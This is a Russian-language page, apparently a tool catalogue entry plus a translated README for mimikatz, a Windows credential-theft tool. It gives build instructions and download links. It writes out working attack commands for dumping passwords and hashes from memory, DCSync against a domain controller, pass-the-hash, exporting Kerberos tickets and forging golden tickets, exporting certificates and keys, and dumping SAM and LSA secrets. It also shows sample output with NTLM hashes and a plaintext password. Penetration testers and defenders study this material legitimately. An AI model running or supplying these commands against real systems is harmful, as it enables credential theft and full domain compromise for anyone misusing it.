Инструмент для извлечения паролей, хешей, PIN-кодов и Kerberos-тикетов из памяти Windows. Поддерживает Pass-the-Hash, Pass-the-Ticket, Golden/Silver Ticket, DCSync и другие техники. Стандартный инструмент любого Windows-пентеста и red team операции.
# Сборка из исходников (Visual Studio 2019+): git clone https://github.com/gentilkiwi/mimikatz # Открыть mimikatz.sln, собрать x64 Release # Или скачать готовый бинарь: # https://github.com/gentilkiwi/mimikatz/releases # Запуск и дамп паролей: mimikatz.exe privilege::debug sekurlsa::logonpasswords lsadump::dcsync /domain:corp.local /user:Administrator
mimikatz — это инструмент, который я создал для изучения языка C и проведения экспериментов с безопасностью Windows.
Он широко известен своей способностью извлекать из памяти пароли в открытом виде, хэши, PIN-коды и билеты Kerberos. mimikatz также может выполнять атаки pass-the-hash, pass-the-ticket или создавать _ Golden tickets_.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
Но это еще не всё! Криптография, Терминальный сервер, События... множество информации доступно в Wiki GitHub: https://github.com/gentilkiwi/mimikatz/wiki или на сайте https://blog.gentilkiwi.com (на французском языке, да).
Если вы не хотите собирать его сами, готовые исполняемые файлы доступны по адресу: https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz представляет собой решение Visual Studio и драйвер WinDDK (необязательный для основных операций), поэтому предварительные требования:
* для mimikatz и mimilib: Visual Studio 2010, 2012 или 2013 для настольных ПК (Visual Studio 2013 Express для настольных ПК бесплатна и поддерживает x86 и x64 - http://www.microsoft.com/download/details.aspx?id=44914)
* для драйвера mimikatz, mimilove (и платформы ddk2003): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800
mimikatz использует SVN для контроля исходного кода, но теперь также доступен через GIT!
Вы можете использовать любые инструменты для синхронизации, даже встроенный GIT в Visual Studio 2013 =)
Сборка / Сборка решения (вы можете изменить архитектуру)mimikatz теперь собран и готов к использованию! (Win32 / x64, и даже ARM64, если повезет)MSB3073, связанная с _build_.cmd и mimidrv. Это происходит потому, что драйвер не может быть собран без Windows Driver Kit 7.1 (WinDDK), но mimikatz и mimilib в порядке.С помощью этой необязательной платформы MSBuild вы можете использовать инструменты сборки WinDDK и стандартную среду выполнения msvcrt (более компактные исполняемые файлы, отсутствие зависимостей).
Для этой необязательной платформы требуются Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 и Visual Studio 2010, даже если вы планируете использовать Visual Studio 2012 или 2013 впоследствии.
Следуйте инструкциям: * https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme * https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader
Проект mimikatz доступен на AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz
Его статус:
Лицензия CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
mimikatz нуждается в кофе для разработки:
* PayPal: https://www.paypal.me/delpy/
gentilkiwi, со мной можно связаться в Twitter ( @gentilkiwi ) или по электронной почте ( benjamin [at] gentilkiwi.com )lsadump были написаны совместно с Vincent LE TOUX, с ним можно связаться по электронной почте ( vincent.letoux [at] gmail.com ) или посетить его сайт ( http://www.mysmartlogon.com )Это личный проект, пожалуйста, уважайте его философию и не используйте во вред!